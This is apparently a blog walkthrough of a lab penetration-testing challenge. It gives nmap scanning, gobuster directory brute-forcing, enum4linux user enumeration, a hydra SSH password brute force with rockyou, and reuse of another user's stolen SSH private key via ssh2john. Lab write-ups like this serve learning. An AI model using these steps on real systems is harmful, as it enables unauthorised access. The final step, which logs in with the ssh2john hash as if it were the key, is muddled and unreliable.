Deploy the machine and connect to our network
Find the services exposed by the machine
use nmap -sS -A -p- IP address to scan for open ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8009/tcp open ajp13
8080/tcp open http-proxy
What is the name of the hidden directory on the web server(enter name without /)?
use gobuster dir -u (ip) -w /usr/share/wordlists/dirb/common.txt to find for hidden directories:
User brute-forcing to find the username & password
use enum4linux -a (ip) to find for users:
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
use hydra with wordlist to crack password hydra -t 4 -l jan -P /usr/share/wordlists/rockyou.txt.gz ssh://(ip)
What is the username?
What is the password?
What service do you use to access the server(answer in abbreviation in all caps)?
Enumerate the machine to find any vectors for privilege escalation
Once inside the user jan, find user kay and list all hidden files. unable to cat pass.bak file. Found a hidden .ssh directory and the private key (id_rsa) is found.
Copy entire private key into a file (hash) and use python program to hash the key: python ssh2john.py hash > sshkey
What is the name of the other user you found(all lower case)?
If you have found another user, what can you do with this information?
use the new hash ssh key to login via ssh – ssh -i (path to hash ssh key) kay@(ip) this will enable to be log on as kay user and able to cat pass.bak file to find the final password
What is the final password you obtain?
Leave a Reply